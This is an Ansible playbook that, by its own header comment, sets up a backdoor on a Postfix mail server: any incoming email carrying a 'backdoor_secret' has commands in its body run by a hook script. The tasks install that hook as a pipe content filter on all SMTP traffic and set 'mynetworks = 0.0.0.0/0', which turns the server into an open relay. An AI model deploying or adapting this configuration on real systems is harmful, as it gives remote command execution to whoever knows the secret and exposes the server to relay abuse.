# Run commands in an email's body if backdoor_secret is found
---
- name: Copy hook script
  template:
    src: 'files/{{ hook_file }}'
    dest: '{{ root_dir }}/{{ hook_file }}'
    mode: 0700
    owner: '{{ shell_user }}'
    group: '{{ shell_user }}'
  become: true

- name: Add the hook definition to bottom of master.cf
  blockinfile:
    dest: /etc/postfix/master.cf
    block: |
      shell unix - n n - - pipe
        flags=F user={{ shell_user }} argv={{ root_dir }}/{{ hook_file }} ${sender} ${size} ${recipient}
  register: hookdefined
  become: true

- name: Add the hook to master.cf
  lineinfile:
    path: /etc/postfix/master.cf
    insertafter: '^smtp      inet n*'
    line: ' -o content_filter=shell:dummy'
  register: hookplaced
  become: true

- name: Change postfix hostname
  lineinfile:
    path: /etc/postfix/main.cf
    regexp: '^myhostname = *'
    line: 'myhostname = {{ hostname }}'
  register: hostchanged
  become: true

- name: Allow relay access from anywhere
  lineinfile:
    path: /etc/postfix/main.cf
    regex: '^mynetworks = *'
    line: 'mynetworks = 0.0.0.0/0'
  register: relayaccess
  become: true

- name: Reload postfix
  command: postfix reload
  when: hookdefined.changed or hookplaced.changed or hostchanged.changed or relayaccess.changed
  become: true

